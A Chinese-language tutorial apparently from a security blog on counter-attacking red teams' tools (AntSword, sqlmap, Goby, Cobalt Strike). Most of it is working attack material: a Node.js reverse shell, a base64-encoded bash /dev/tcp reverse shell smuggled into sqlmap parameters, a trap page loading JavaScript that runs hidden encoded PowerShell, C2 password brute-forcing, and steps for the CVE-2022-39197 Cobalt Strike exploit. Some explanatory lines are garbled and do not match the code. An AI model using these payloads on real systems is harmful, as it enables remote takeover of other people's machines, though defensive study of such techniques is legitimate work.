朔源反制-170-对抗上线CS，Goby，蚁剑，Sqlmap等安全工具

cs反制

红队在进行连接后门时候：

代码为一句话后门：

修改为

header('HTTP/1.1 500 ');

该字段意思为：当img src指向的图片不存在时会弹窗1

依据此 可进行蚁剑上线代码：

var net = require("net"), sh = require("child_process").exec("cmd.exe");

var client = new net.Socket();

client.connect(xx, "xx.xx.xx.xx", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

xx为监听的端口号 xx.xx.xx.xx为监听主机

两者组合编码后：

header("HTTP/1.1 500 Not ");

最终 蓝队通过修改后门的代码实现获得蚁剑使用者的权限（主机权限）

sqlmap反制

构造一个页面 在含有注入点的时候，其中数据包含有反制的数据包：步骤为

命令管道符：ping "`dir`"

构造注入点页面固定注入参数值，等待攻击者进行注入

sqlmap -u "http://47.94.236.117/test.html?id=aaa&b=`dir`"

将dir的参数换为 反弹shell的命令

sqlmap -u "http://47.94.236.117/test.html?id=aaa&b=`exec /bin/sh 0&0 2>&0`"

1、测试反弹编码：

bash -i >& /dev/tcp/47.94.236.117/2333 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ==

echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i

2、蓝队构造页面test.php注入页面固定参数值：

search the user

query=shell`echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i`&port=6379"/>

3、红队攻击者进行注入测试：

sqlmap -u "http://xx.xx.xx.xx/test.php" --data "name=xiaodi&id=45273434&query=shell`echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== | base64 -d|bash -i`&port=6379"

即可中招

goby反制

构造页面中含有反制代码的js文件，

index页面

index.php

header("X-Powered-By: PHP/http%3A//47.94.236.117/1.js'))>");

?>

testtest

js文件：此处换为Cs的powershell，红队在进行资产信息查看时，会触发反弹shell

(function(){

require('child_process').exec('powershell -nop -w hidden -encodedcommand JABXXXXXXXX......');

})();

cs反制

反制Server，爆破密码（通用）

针对没有采用隐匿C2地址的技术导致的反制（后门样本被溯源到C2地址）

项目地址https://github.com/ryanohoro/csbruter

python csbruter.py 47.94.236.117 pass.txt

利用漏洞（CVE-2022-39197）Cobalt Strike <=4.7 XSS

项目地址https://github.com/its-arun/CVE-2022-39197

条件：有木马样本

取得红队木马样本开始操作如下：

1、蓝队修改EXP里面的执行命令后编译，红队客户端所触发的东西在这里修改：如上线cs

步骤为：修改：EvilJar/src/main/java/Exploit.java

2、蓝队修改svg加载地址并架设Web服务（红队的CS服务器能访问的Web服务）

修改：evil.svg 指向url地址

python -m http.server 8888

3、蓝队执行EXP调用后门上线，攻击者进程查看时触发

python cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.svg